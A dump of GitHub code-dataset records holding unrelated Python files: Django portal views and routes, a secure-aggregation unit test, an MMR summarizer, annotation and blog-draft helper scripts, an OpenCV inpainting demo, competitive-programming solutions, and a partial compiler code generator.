info=request.POST[\"info\"].encode('utf8')\n return HttpResponse(newName)\n\telif request.POST[\"iname\"] == \"modify-isp\":\n\t\tiid=request.POST[\"isp-id\"]\n\t\tname=request.POST[\"isp-name\"].encode('utf8')\n\t\tcontact=request.POST[\"isp-contact\"].encode('utf8')\n\t\tphone=request.POST[\"isp-phone\"].encode('utf8')\n\t\tinfo=request.POST[\"isp-info\"].encode('utf8')\n\t\taddress=request.POST[\"isp-address\"].encode('utf8')\n\t\t#数据库保存数据\n\t\ts1 = Isp.objects.filter(id=iid).update(name=name,contact=contact,phone=phone,info=info,address=address)\n\t\treturn render(request,'portal/formRes.html')\n\ndef delete(request):\n\t#不允许直接访问该地址\n\tif 'HTTP_REFERER' in 
request.META.keys():\n\t\treferrer=request.META['HTTP_REFERER']\n\t\tif referrer != indexURL:\n\t\t\treturn HttpResponse(status=403)\n\t\telse:\t\n\t\t\tif request.GET.get('t') == 'host':\n\t\t\t\thid = request.GET.get('id')\n\t\t\t\tname = request.GET.get('name')\n\t\t\t\tip = request.GET.get('ip')\n\t\t\t\tHost.objects.filter(id=hid).delete()\n\t\t\t\treturn render(request,'portal/formRes.html')\t\t\t\n\t\t\telif request.GET.get('t') == 'idc':\n\t\t\t\tiid = request.GET.get('id')\n\t\t\t\tname = request.GET.get('name')\n\t\t\t\tisp = request.GET.get('isp')\n\t\t\t\tIdc.objects.filter(id=iid).delete()\n\t\t\t\treturn render(request,'portal/formRes.html') \n\t\t\telif request.GET.get('t') == 'isp':\n\t\t\t\tiid = request.GET.get('id')\n\t\t\t\tIsp.objects.filter(id=iid).delete()\n\t\t\t\treturn render(request,'portal/formRes.html')\n\t\t\t\n\telse:\n\t\treturn HttpResponse(status=403)\ndef modify(request):\n\t#不允许直接访问该地址\n\tif 'HTTP_REFERER' in request.META.keys():\n\t\treferrer=request.META['HTTP_REFERER']\n\t\tif referrer != indexURL:\n\t\t\treturn HttpResponse(status=403)\n\t\telse:\n\t\t\tif request.GET.get('t') == 'host':\n\t\t\t\tt = request.GET.get('t')\n\t\t\t\tname = request.GET.get('name')\n\t\t\t\tip = request.GET.get('ip')\n\t\t\t\tdict_host_info = request.GET\n\t\t\t\treturn render(request,'portal/modify_host.html',{'dict_host_info':dict_host_info})\n\t\t\telif request.GET.get('t') == 'idc':\n\t\t\t\tt = request.GET.get('t')\n\t\t\t\tname = request.GET.get('name')\n\t\t\t\tisp = request.GET.get('isp')\n\t\t\t\tdict_idc_info = request.GET\n\t\t\t\treturn render(request,'portal/modify_idc.html',{'dict_idc_info':dict_idc_info})\n\t\t\telif request.GET.get('t') == 'isp':\n\t\t\t\tdict_isp_info = request.GET\n\t\t\t\treturn render(request,'portal/modify_isp.html',{'dict_isp_info':dict_isp_info})\n\t\t\telif request.GET.get('t') == 'initHost':\n\t\t\t\tdict_init_info = request.GET\n\t\t\t\treturn render(request,'portal/initHost.html',{'dict_init_info':dict_init_info})\n\telse:\n return HttpResponse(status=403)\ndef initHost(request):\n\t#不允许直接访问该地址\n\tif 'HTTP_REFERER' in request.META.keys():\n\t\treferrer=request.META['HTTP_REFERER']\n\t\tif referrer != indexURL:\n\t\t\treturn HttpResponse(status=403)\n\t\telse:\n\t\t\treturn render(request,'portal/initHost.html')\n\telse:\n\t\treturn HttpResponse(status=403)\n#表单提交\ndef form_upload(request):\n\tif request.method == 'POST':\n\t\treturn HttpResponse('数据提交成功!')\n\telse:\n\t\treturn HttpResponse(\"test\")\ndef test1(request):\n\treturn render(request,'portal/formRes.html')\ndef test2(request):\n\treturn render(request,'portal/test2.html')\n\ndef test3(request):\n\treturn render(request,'portal/test3.html')\n\n\n","repo_name":"AnubisOrHades/pythonNote","sub_path":"WEB/django/xman/portal/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7657,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"41187545902","text":"from collections import OrderedDict\nimport unittest\n\nimport numpy as np\n\nfrom neursafe_fl.python.libs.secure.secure_aggregate.ssa_protector import \\\n SSAProtector\nfrom neursafe_fl.python.libs.secure.secure_aggregate.common import \\\n PseudorandomGenerator\n\n\nclass TestSSAProtector(unittest.TestCase):\n \"\"\"Test class of SSA protector.\n \"\"\"\n def setUp(self):\n self.protector = SSAProtector(\"test\", False)\n\n self.protector.id_ = \"my_id\"\n self.protector.b = 1234\n self.protector.s_uv_s = [(\"my_ia\", 
PseudorandomGenerator(1234)),\n (\"my_ie\", PseudorandomGenerator(1234))]\n\n self.prg = PseudorandomGenerator(1234)\n\n def test_should_success_encrypt_int(self):\n result = self.protector.encrypt(1)\n\n self.assertEqual(result, 1 + self.prg.next_value())\n\n def test_should_success_encrypt_float(self):\n result = self.protector.encrypt(1.123)\n\n self.assertEqual(result, 1.123 + self.prg.next_value())\n\n def test_should_success_encrypt_np_array(self):\n np_array = np.ones((1, 2, 3), dtype=np.int16)\n new_array = self.protector.encrypt(np_array)\n self.assertTrue(\n self.__equal(new_array,\n np.full_like(new_array,\n 1 + self.prg.next_value(np_array.shape))))\n\n def test_should_success_encrypt_list(self):\n np_array_list = [np.ones((2, 2, 3), dtype=np.int16),\n np.full((3, 1, 3), 2)]\n new_array_list = self.protector.encrypt(np_array_list)\n\n self.assertTrue(self.__equal(\n new_array_list[0],\n np.full((2, 2, 3), 1 + self.prg.next_value((2, 2, 3)))))\n self.assertTrue(self.__equal(\n new_array_list[1],\n np.full_like(new_array_list[1], 2 + self.prg.next_value((3, 1, 3)))))\n\n def test_should_success_encrypt_dict(self):\n np_array = np.ones((1, 2, 3), dtype=np.int16)\n ordered_dict = OrderedDict()\n ordered_dict['int'] = 1\n ordered_dict['float'] = 1.1\n ordered_dict['array'] = np_array\n new_dict = self.protector.encrypt(ordered_dict)\n self.assertEqual(new_dict['int'], 1 + self.prg.next_value())\n self.assertEqual(new_dict['float'], 1.1 + self.prg.next_value())\n self.assertTrue(self.__equal(\n new_dict['array'],\n np.full_like(new_dict['array'], 1 + self.prg.next_value((1, 2, 3)))))\n\n def __equal(self, array1, array2):\n for index, value in enumerate(array1):\n result = abs(value - array2[index]) < 0.000001\n if not result.all():\n return False\n return True\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"neursafe/neursafe-fl","sub_path":"neursafe_fl/python/libs/secure/secure_aggregate/test_ssa_protector.py","file_name":"test_ssa_protector.py","file_ext":"py","file_size_in_byte":2739,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"44"} +{"seq_id":"23200287926","text":"from QFSE.Sentence import Sentence\r\nfrom collections import defaultdict\r\nimport operator\r\nfrom sklearn import cluster\r\nimport numpy as np\r\nfrom sklearn.decomposition import PCA\r\nfrom QFSE.SummarizerBase import SummarizerBase\r\nfrom QFSE.Utilities import isPotentialSentence\r\n\r\nimport math\r\n\r\nQUERY_DOC_ALIAS = '_QUERY_'\r\nREDUNDANCY_THRESHOLD = 0.95\r\n\r\n#import ipdb\r\n\r\n\r\n\r\n## MMR implementation following https://github.com/vishnu45/NLP-Extractive-NEWS-summarization-using-MMR/blob/master/mmr_summarizer.py\r\n\r\n\r\ndef _TFs(sentences):\r\n \"\"\" Function to find the TF score of the words in the document cluster\r\n Inputs:\r\n sentences: sentences of the document cluster\r\n Outputs:\r\n tfWords: dictionary of words, TF score\r\n \"\"\"\r\n tfWords = {}\r\n for sent in sentences:\r\n for word in sent.tokens:\r\n word = word.lower()\r\n tfWords[word] = tfWords.get(word, 0) + 1\r\n\r\n return tfWords\r\n\r\n\r\n\r\ndef _IDFs(corpus):\r\n \"\"\" Function to find the IDF score of the words in the document cluster\r\n Inputs:\r\n sentences: sentences of the document cluster\r\n Outputs:\r\n idfWords: dictionary of words, IDF score\r\n \"\"\"\r\n N = len(corpus.documents)\r\n idfWords = {}\r\n\r\n all_words = []\r\n for doc in corpus.documents:\r\n all_words.extend(doc.tfs.keys())\r\n\r\n for word in all_words:\r\n n = 0\r\n 
for doc in corpus.documents:\r\n n += doc.tfs.get(word,0)\r\n try:\r\n idf = math.log10(float(N)/n)\r\n except ZeroDivisionError:\r\n idf = 0\r\n idfWords[word] = idf\r\n\r\n\r\n return idfWords\r\n\r\n\r\n\r\ndef _TFIDFs(sentences):\r\n \"\"\" Function to find the TF-IDF score of the words in the document cluster\r\n Inputs:\r\n sentences: sentences of the document cluster\r\n Outputs:\r\n tfidfWords: dictionary of words, TF-IDF score\r\n \"\"\"\r\n tfWords = _TFs(sentences)\r\n idfWords = _IDFs(sentences)\r\n tfidfWords = {}\r\n\r\n for word in tfs:\r\n tfidfScore = tfWords[word] * idfWords[word]\r\n\r\n if tfidfWords.get(tfidfScore, None) == None:\r\n tfidfWords[tfidfScore] = [word]\r\n else:\r\n tfidfWords[tfidfScore].append(word)\r\n\r\n return tfidfWords\r\n\r\n\r\ndef MMRScore(sentence, query, summary, lambta=0.5):\r\n \"\"\" Function to calculate the MMR score given a sentence, the query, \r\n and the current best set of sentences\r\n Inputs:\r\n sentence: sentence for which MMR score has to be calculated\r\n query: query sentence for the document cluster\r\n summary: list of sentences in the current summary\r\n lambta: MMR score hyperparameter\r\n Outputs:\r\n score: MMR score for the given sentence\r\n sim1: similarity score between sentene and query\r\n sim2: best similarity score w.r.t. summary so far\r\n \"\"\"\r\n sim1 = sentence.similarity(query)\r\n l_expr = lambta * sim1\r\n value = [float(\"-inf\")]\r\n\r\n for sent in summary:\r\n sim2 = sentence.similarity(sent)\r\n value.append(sim2)\r\n\r\n sim2 = max(value)\r\n\r\n r_expr = (1-lambta) * sim2\r\n score = l_expr - r_expr\t\r\n\r\n return score, sim1, sim2\r\n\r\n\r\nclass SummarizerMMR(SummarizerBase):\r\n \r\n def __init__(self, corpus, evaluateOnTheFly=False):\r\n super().__init__(corpus, evaluateOnTheFly=evaluateOnTheFly)\r\n\r\n # A dictionary of pairs of Sentence IDs (symettrical) with the similarity score between them,\r\n # this is to save time computing it when needed again.\r\n self.sentencesSimilarities = defaultdict(lambda: {})\r\n # the following will be initialized in the _getGenericSummaryText call\r\n self.sentenceClusters = {} # dict { clusterLabel -> [listOfSentencesInCluster] }\r\n self.sentenceClusterLabelsOrdered = [] # order list of clusters to use\r\n self.sentenceClusterIndexLast = -1 # the last index used in sentenceClusterLabelsOrdered\r\n self.isGenericClustering = False\r\n\r\n def _getGenericSummaryText(self, desiredWordCount):\r\n \r\n if self.isGenericClustering:\r\n self.sentenceClusters, self.sentenceClusterLabelsOrdered = self._prepareForClustering()\r\n self.sentenceClusterIndexLast = -1\r\n\r\n else:\r\n self._prepareForMMR()\r\n\r\n\r\n # concatenate sentences until the the word limit is up:\r\n finalSummaryTxtList, finalSummaryIds, numWordsInSummary = self._getNextGeneralSentences(desiredWordCount)\r\n\r\n if len(finalSummaryTxtList) == 0:\r\n finalSummaryTxtList = ['NO INFORMATION TO SHOW.']\r\n finalSummaryIds = []\r\n\r\n return finalSummaryTxtList, finalSummaryIds, numWordsInSummary\r\n\r\n \r\n def _prepareForMMR(self):\r\n # this code prepare for MMR by calculating the tfs, tf-idfs for each document words\r\n # there by calculating the tf-idfs. 
This is usefuly to build the initial query\r\n \r\n ## add tfs for each document\r\n for doc in self.corpus.documents:\r\n tfs = _TFs(doc.sentences)\r\n doc.tfs = tfs\r\n\r\n ## get idfs of each word:\r\n idfs = _IDFs(self.corpus)\r\n\r\n ## get tf-idf for each word in a document:\r\n tfidfs = {}\r\n for doc in self.corpus.documents:\r\n for word,value in doc.tfs.items():\r\n tfidfs[word] = value * idfs[word]\r\n doc.tfidfs = tfidfs\r\n\r\n\r\n def _prepareForClustering(self):\r\n # The algorithm here is:\r\n # PCA on each of the sentences' average word w2v vectors\r\n # K-means to clusters on the reduced-sized vectors\r\n # Take the best representative sentence from the largest clusters until max word count is reached\r\n\r\n # reduce the dimensionality of the vectors (from 300(w2v)/768(bert) to 20), since high dimensionality vectors are tough on K-Means:\r\n pca = PCA(n_components=20, random_state=0)\r\n vectors = [sent.representation for sent in self.allSentencesForPotentialSummaries]\r\n pca.fit(vectors)\r\n reducedVectors = pca.transform(vectors)\r\n\r\n # cluster the sentences by their reduced representation embeddings:\r\n k_means = cluster.KMeans(n_clusters=30, random_state=0)\r\n #vectorToSentence = {str(sent.spacyDoc.vector):sent for sent in corpus.allSentences}\r\n k_means.fit(reducedVectors)\r\n # count the number of sentences in each cluster:\r\n labels, labelCounts = np.unique(k_means.labels_[k_means.labels_ >= 0], return_counts=True)\r\n\r\n # group together the indices of the sentences that were labeled into the same cluster:\r\n sentenceClusters = defaultdict(lambda : []) # { labelOfCluster -> [list of sentence indices] }\r\n for idx, label in enumerate(k_means.labels_):\r\n sentenceClusters[label].append(idx)\r\n\r\n # keep the order of the labels that the clusters should be used:\r\n sentenceClusterLabelsOrdered = labels[np.argsort(-labelCounts)]\r\n\r\n return sentenceClusters, sentenceClusterLabelsOrdered\r\n\r\n\r\n def _getNextGeneralSentences(self, desiredWordCount):\r\n # concatenate sentences until the the word limit is up:\r\n numWordsInSummary = 0\r\n finalSummaryTxtList = []\r\n finalSummaryIds = []\r\n if self.isGenericClustering:\r\n while numWordsInSummary < desiredWordCount and not self._noMoreSentences():\r\n # get the next index to use in the sentenceClusterLabelsOrdered list (loop back to the beginning):\r\n self.sentenceClusterIndexLast = (self.sentenceClusterIndexLast + 1) % len(self.sentenceClusterLabelsOrdered)\r\n # get the index of the cluster to use now:\r\n curClusterLabel = self.sentenceClusterLabelsOrdered[self.sentenceClusterIndexLast]\r\n # get the best sentence in that cluster:\r\n bestSentenceInCluster = self._getBestSentence(self.allSentencesForPotentialSummaries,\r\n self.sentenceClusters[curClusterLabel], self.corpus)\r\n # append the chosen sentence to the summary:\r\n if bestSentenceInCluster != None:\r\n finalSummaryTxtList.append(bestSentenceInCluster.text)\r\n finalSummaryIds.append(bestSentenceInCluster.sentId)\r\n numWordsInSummary += len(bestSentenceInCluster)\r\n self.usedSentences[bestSentenceInCluster.sentId] = bestSentenceInCluster\r\n self.usedSentencesText[bestSentenceInCluster.textCompressed] = bestSentenceInCluster.sentId\r\n\r\n else:\r\n # now create MMR-based generic summary\r\n topWords = self._findTopWords()\r\n queryAsSentence = Sentence(QUERY_DOC_ALIAS, len(self.queries), \" \".join(topWords), self.corpus.representationStyle)\r\n\r\n # get an ordered list of sentences based on its MMR score:\r\n lambta = 0.5\r\n 
usedSentencesList = []\r\n sentenceMMRScores = [(sentence,) + MMRScore(sentence, queryAsSentence, usedSentencesList, lambta) # [(sent, mmrscore, sim1, sim2)]\r\n for sentence in self.allSentencesForPotentialSummaries] \r\n sentencesUsing = []\r\n while numWordsInSummary < desiredWordCount and not self._noMoreSentences():\r\n if len(sentencesUsing)>0:\r\n ## take the last added sentence and update the mmr score for the rest of the sentenes\r\n for index, sentMMR in enumerate(sentenceMMRScores):\r\n newSim2 = sentMMR[0].similarity(sentencesUsing[-1])\r\n if newSim2 > sentMMR[3]:\r\n mmrScore = lambta*sentMMR[2] - (1-lambta)*newSim2\r\n sentenceMMRScores[index] = (sentMMR[0], mmrScore, sentMMR[2], newSim2)\r\n \r\n sentenceMMRScores.sort(key=operator.itemgetter(1), reverse=True)\r\n # keep taking most query-similar, non-redundant sentences until we have enough:\r\n for index, (sentence,_,_,_) in enumerate(sentenceMMRScores):\r\n if sentence.sentId not in self.usedSentences and sentence.textCompressed not in self.usedSentencesText:\r\n sentencesUsing.append(sentence)\r\n finalSummaryTxtList.append(sentence.text)\r\n finalSummaryIds.append(sentence.sentId)\r\n numWordsInSummary += len(sentence)\r\n self.usedSentences[sentence.sentId] = sentence\r\n self.usedSentencesText[sentence.textCompressed] = sentence.sentId\r\n sentenceMMRScores.pop(index)\r\n break\r\n\r\n return finalSummaryTxtList, finalSummaryIds, numWordsInSummary\r\n\r\n\r\n def _findTopWords(self, max_num=20):\r\n ## give a list of top frequent words based on tf-idf scores\r\n top_k_words = []\r\n for doc in self.corpus.documents:\r\n top_k_words.extend([(word, doc.tfidfs[word]) for word in sorted(doc.tfidfs, key=doc.tfidfs.__getitem__, reverse=True)[:max_num]])\r\n\r\n unique_ranked_words = []\r\n top_k_words = sorted(top_k_words, key=lambda x:x[1], reverse=True)\r\n for word,score in top_k_words:\r\n if word in unique_ranked_words:\r\n continue\r\n else:\r\n unique_ranked_words.append(word)\r\n\r\n return unique_ranked_words[:max_num]\r\n\r\n \r\n def _getBestSentence(self, allSentencesList, possibleIndicesOfSentences, corpus):\r\n # gets the highest scoring sentence in the possible sentences in reference to the corpus given\r\n bestSentence = None\r\n bestSentScore = -1\r\n for idx in possibleIndicesOfSentences:\r\n sentence = allSentencesList[idx]\r\n if sentence.sentId not in self.usedSentences and sentence.textCompressed not in self.usedSentencesText: # skip sentences that were already used\r\n sentScore = self._getSentenceScore(sentence, self.corpus.wordCounter)\r\n if sentScore > bestSentScore:\r\n bestSentence = sentence\r\n bestSentScore = sentScore\r\n return bestSentence\r\n\r\n def _getSentenceScore(self, sentence, corpusWordCounter):\r\n # the score is the average word weight in the sentence\r\n # where word weight is the number of times the word appears in the corpus\r\n sentenceWordWeightTotal = 0\r\n for token in sentence.tokens:\r\n sentenceWordWeightTotal += corpusWordCounter[token.lower()]\r\n sentenceWordWeightAvg = float(sentenceWordWeightTotal) / len(sentence)\r\n return sentenceWordWeightAvg\r\n\r\n ##numEntities = len(sentence.spacyDoc.ents)\r\n #numSignificantWords = float(sentence.spacyDoc._.num_significant_words)\r\n #sentLen = float(len(sentence.spacyDoc))\r\n #return (numSignificantWords / sentLen) * log(sentLen)\r\n\r\n\r\n def _getQuerySummaryText(self, query, numSentencesNeeded, sentences):\r\n # The algorithm here is:\r\n # Spacy-vectorize the query\r\n # Get the similarity of the query to each of 
the potential sentences in the corpus\r\n # Take the most similar sentences to the query as long as it isn't redundant to the sentences already added\r\n # (and not sentences in previous summaries)\r\n\r\n if self._noMoreSentences():\r\n return [\"NO MORE INFORMATION.\"], [], 0\r\n\r\n if query == '':\r\n finalSummaryTxtList, finalSummaryIds, numWordsInSummary = self._getNextGeneralSentences(numSentencesNeeded * 20)\r\n return finalSummaryTxtList, finalSummaryIds, numWordsInSummary\r\n\r\n\r\n # make a sentence object for the query:\r\n queryAsSentence = Sentence(QUERY_DOC_ALIAS, len(self.queries), query, self.corpus.representationStyle)\r\n\r\n # get an ordered list of sentences based on its MMR score:\r\n lambta = 0.5\r\n usedSentencesList = [v for k,v in self.usedSentences.items()]\r\n sentenceMMRScores = [(sentence,) + MMRScore(sentence, queryAsSentence, usedSentencesList, lambta) # [(sent, mmrscore, sim1, sim2)]\r\n for sentence in self.allSentencesForPotentialSummaries] \r\n sentencesUsing = []\r\n while(len(sentencesUsing)<=numSentencesNeeded):\r\n if len(sentencesUsing)>0:\r\n ## take the last added sentence and update the mmr score for the rest of the sentenes\r\n for index, sentMMR in enumerate(sentenceMMRScores):\r\n newSim2 = sentMMR[0].similarity(sentencesUsing[-1])\r\n if newSim2 > sentMMR[3]:\r\n mmrScore = lambta*sentMMR[2] - (1-lambta)*newSim2\r\n sentenceMMRScores[index] = (sentMMR[0], mmrScore, sentMMR[2], newSim2)\r\n \r\n sentenceMMRScores.sort(key=operator.itemgetter(1), reverse=True)\r\n # keep taking most query-similar, non-redundant sentences until we have enough:\r\n for index, (sentence,_,_,_) in enumerate(sentenceMMRScores):\r\n if sentence.sentId not in self.usedSentences and sentence.textCompressed not in self.usedSentencesText:\r\n sentencesUsing.append(sentence)\r\n self.usedSentences[sentence.sentId] = sentence\r\n self.usedSentencesText[sentence.textCompressed] = sentence.sentId\r\n sentenceMMRScores.pop(index)\r\n break\r\n\r\n # return also the length in words of the returned summary:\r\n summaryLength = sum(len(sent) for sent in sentencesUsing)\r\n\r\n return [sent.text for sent in sentencesUsing], [sent.sentId for sent in sentencesUsing], summaryLength\r\n\r\n\r\n def _isRedundant(self, sentence, otherSentences):\r\n # check if the sentence is too similar to the other sentences:\r\n for otherSentence in otherSentences:\r\n # see if we know the similarities already from before:\r\n if not sentence.sentId in self.sentencesSimilarities or not otherSentence.sentId in self.sentencesSimilarities[sentence.sentId] and not self._isRedundant(sentence, sentencesUsing):\r\n sim = sentence.similarity(otherSentence)\r\n self.sentencesSimilarities[sentence.sentId][otherSentence.sentId] = sim\r\n self.sentencesSimilarities[otherSentence.sentId][sentence.sentId] = sim\r\n\r\n if self.sentencesSimilarities[sentence.sentId][otherSentence.sentId] > REDUNDANCY_THRESHOLD:\r\n return True\r\n\r\n return False\r\n\r\n def _isPotentialSentence(self, sentence):\r\n return isPotentialSentence(sentence)\r\n\r\n def _noMoreSentences(self):\r\n return len(self.usedSentences) == len(self.allSentencesForPotentialSummaries)\r\n","repo_name":"BIU-NLP/iFACETSUM","sub_path":"QFSE/SummarizerMMR.py","file_name":"SummarizerMMR.py","file_ext":"py","file_size_in_byte":16815,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"44"} +{"seq_id":"74123777092","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport os\nimport sys\nimport 
xml.etree.ElementTree as ET\nfrom multiprocessing import Pool\nimport xml_converter_lib\nimport time\n\n'''\nINSTRUCTIONS\n-------------------------------------------------------------------\nThis is a converter script to convert Pascal VOC .xml annotation \nfiles to Darknet .txt annotation files.\n\nPut both xml_converter.py and xml_converter_lib.py in the dir \nabove the folder containing the annotations in Pascal VOC format.\n\nPut labels.txt in the dir above xml_converter.py.\n\nIf you want to change where the text files are written to, modify \ndef write_converted_file() in xml_converter_lib.py.\n\nDefault write location is /txt.\n\nUses multiprocessing to spawn multiple threads for minor speed-up.\nRun main() if you run into problems.\n'''\n\ndef main(num_threads = xml_converter_lib.getThreads()):\n\n subdir = input(\"Enter subdir: \")\n\n start = time.time()\n p = Pool(processes = num_threads)\n files = xml_converter_lib.FileGenerator(subdir)()\n p.map(xml_converter_lib.write_converted_file, files)\n p.close()\n p.join()\n end = time.time()\n\n print(\"\")\n print(\"Completed in {0:.3f} seconds.\".format(end-start))\n print(\"\")\n\nif __name__ == \"__main__\":\n main()\n \n ","repo_name":"tgymartin/PascalVOC2Darknet","sub_path":"xml_converter.py","file_name":"xml_converter.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"33523544992","text":"import tkinter as tk\nfrom tkinter import filedialog\nimport os\nimport sys\n\n\ndef get_title(file_path):\n title = os.path.splitext(file_path)[0]\n title = title.split('_')[1]\n title = title.replace('-', ' ')\n return title\n\n\nGALLERY_OPTION = \"gallery\"\nLINK_OPTION = \"link\"\n\n# read in argument value\nif len(sys.argv) == 2:\n OPTION = sys.argv[1]\nelse:\n OPTION = 0\n\n# Select images from directory\nroot = tk.Tk()\nroot.withdraw()\nfile_paths = filedialog.askopenfilenames()\n# file_paths = ('C:/Users/John/projects/johng/static/images/milan/2017-04-05T123000_VIBRA-Team.jpg',\n# 'C:/Users/John/projects/johng/static/images/milan/2017-04-06T063907_Gepaeck.jpg')\n\n# get date of oldest image\nfile_path = file_paths[-1]\ndate_oldest = os.path.basename(file_path)[:10]\n\n# build header\nheader = [\"+++\", 'date = \"{}\"'.format(date_oldest),\n \"draft = true\",\n 'title = \"Titel\"',\n 'image = \"\"',\n 'categories = [\"Milan\"]',\n \"+++\"]\n\n# write draft blog entry\nwith open('content/post/italy/draft.md', 'w') as output:\n output.write(\"\\n\".join(header))\n\n output.write(\"\\n\\n\")\n\n output.write(\"{{< load-photoswipe >}}\\n\\n\")\n\n tab = ''\n\n if OPTION == GALLERY_OPTION:\n output.write(\"{{< gallery >}}\\n\\n\")\n tab = \"\\t\"\n\n for file_path in file_paths:\n title = get_title(file_path)\n rel_path = file_path.split(\"/static\")[1]\n\n if OPTION == LINK_OPTION:\n image_link = \"![{}]({})\".format(title, rel_path)\n else:\n image_link = tab + '{{{{< figure caption=\"{}\" src=\"{}\" alt=\"{}\" >}}}}'.format(title, rel_path, title)\n\n output.write(image_link + \"\\n\\n\")\n\n if OPTION == GALLERY_OPTION:\n output.write(\"{{< /gallery >}}\")\n","repo_name":"jhgee/johng","sub_path":"createDraft.py","file_name":"createDraft.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"30052371684","text":"\"\"\"\nCreated by Alex Wang on 2018-03-13\n图像复原美化:\n inpaint水印去除\n\"\"\"\nimport cv2\nimport numpy as np\n\n\ndef 
test_image_inpaint():\n \"\"\"\n cv2.inpaint(src, inpaintMask, inpaintRadius, flags[, dst]) → dst\n Parameters:\n\n\t* src – Input 8-bit 1-channel or 3-channel image.\n\t* inpaintMask – Inpainting mask, 8-bit 1-channel image. Non-zero pixels indicate the area that needs to be inpainted.\n\t* dst – Output image with the same size and type as src .\n\t* inpaintRadius – Radius of a circular neighborhood of each point inpainted that is considered by the algorithm.\n\t* flags –\n Inpainting method that could be one of the following:\n\n\t\t* INPAINT_NS Navier-Stokes based method [Navier01]\n\t\t* INPAINT_TELEA Method by Alexandru Telea [Telea04].\n :return:\n \"\"\"\n img = cv2.imread('scenery.jpg')\n print(img.shape)\n img_black = img.copy()\n black_block = np.zeros(shape=(20, 20, 3), dtype=np.uint8)\n img_black[690:710, 100:120, :] = black_block\n\n white_block = np.ones(shape=(20, 20), dtype=np.uint8)\n mask_image = np.zeros(shape=(img.shape[0], img.shape[1]), dtype=np.uint8)\n print(mask_image.shape)\n mask_image[690:710, 100:120] = white_block\n img_recovery = cv2.inpaint(img_black, mask_image, 3, cv2.INPAINT_NS)\n\n cv2.imshow('img', img)\n cv2.imshow('img_black', img_black)\n cv2.imshow('img_recovery', img_recovery)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n\nif __name__ == '__main__':\n test_image_inpaint()\n","repo_name":"alexwongdl/PythonTemplate","sub_path":"test/test_opencv/image_recovery.py","file_name":"image_recovery.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"27916982528","text":"# 로봇 청소기\n# 현재칸이 청소되어 있지 않을 경우 현재칸을 청소한다.\n# 현재 칸 기준 4방향이 모두 청소되어있을 경우 1. 바라보는 방향을 유지한채 후진한다. 2. 뒤쪽칸이 벽이면 작동을 멈춘다.abs\n# 4방향 중 청소되지 않은 빈칸이 있을 경우 1. 반시계 방향으로 회전, 2. 바라보는 방향이 청소x면 전진, 3. 
현재칸을 청소한다로 돌아간다.\n# 0은 청소x, 1은 벽을 의미한다.\n\nfrom collections import deque\nimport sys\nread = sys.stdin.readline\n\nn, m = map(int, read().split())\nr, c, d = map(int, read().split())\n# 0 : 북, 1 : 동, 2 : 남, 3 : 서\ndx = [-1, 0, 1, 0]\ndy = [0, 1, 0, -1]\n\ngraph = []\nfor i in range(n):\n graph.append(list(map(int, read().split())))\n\nvisited = [[False]*m for _ in range(n)]\nflag = 0\n\ndef bfs():\n global cnt\n global d\n global flag\n queue = deque()\n queue.append((r, c))\n visited[r][c] = True\n cnt = 1\n\n while queue:\n x, y = queue.popleft()\n\n for i in range(4):\n d = (d-1)%4 # 1씩 감소시켜 반시계 방향으로 탐색\n nx, ny = x+dx[d], y+dy[d]\n\n if graph[nx][ny]==0 and not visited[nx][ny]: # 어차피 벽이 1로 둘러싸여 0<=nx/', UserAPI.as_view()),\n path('api/moims/', MoimListView.as_view(), name='moim_list'),\n path('api/moims/', MoimView.as_view(), name='moim_detail'),\n path('api/moims//schedules', ScheduleListView.as_view(), name='moim_detail'),\n path('api/moims//schedules/', ScheduleView.as_view(), name='moim_detail'),\n path('api/articles/', ArticleListView.as_view(), name='article_list'),\n path('api/articles/', ArticleView.as_view(), name='article_detail'),\n]\n","repo_name":"mylumiere/somoim","sub_path":"back/back/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"74604043331","text":"#!/usr/bin/env python3\n\"\"\"\nAutor: Matheus da Silva Garcias\nMatrícula: 20171BSI0456\nProblema: https://open.kattis.com/problems/speedlimit\nResultado: https://open.kattis.com/submissions/5463805\n\"\"\"\n\nfrom sys import stdin, stdout\n\ninput = stdin.readline\nprint = stdout.write\n\nn = int(input())\n\nwhile(n > -1):\n miles = 0\n last_t = 0\n for _ in range(n):\n s, t = [int(x) for x in input().strip().split(' ')]\n tmp = t\n t -= last_t\n miles += t * s\n last_t = tmp\n print(\"%d miles\\n\" % miles)\n\n n = int(input())","repo_name":"0xdeadbad/Kattis-TPA","sub_path":"src/speedlimit/speedlimit.py","file_name":"speedlimit.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"3235567923","text":"from pprint import pprint\n\n\nclass Codegen:\n def __init__(self):\n self.semantic_errors = []\n self.semantic_stack = []\n self.program_block = []\n self.cur_temp = 1000\n self.temp = {}\n self.cur_mem_addr = 500\n self.func_memory_cur = 2000\n self.memory = {}\n self.break_stack = []\n self.main_access_link = None\n self.fun_declarating = False\n self.arg_declarating = False\n self.action_symbols = {\n 'pid': self.pid,\n 'pnum': self.pnum,\n 'array_address': self.array_address,\n 'assign': self.assign,\n 'add': self.add,\n 'mult': self.mult,\n 'save': self.save,\n 'jp': self.jp,\n 'jpf': self.jpf,\n 'label': self.label,\n 'relop': self.relop,\n 'relop_sign': self.relop_sign,\n 'sign': self.sign,\n 'signed_num': self.signed_num,\n 'while': self.whil,\n 'pop': self.pop,\n 'output': self.output,\n 'save_arr': self.save_arr,\n 'tmp_save': self.tmp_save,\n 'cmp_save': 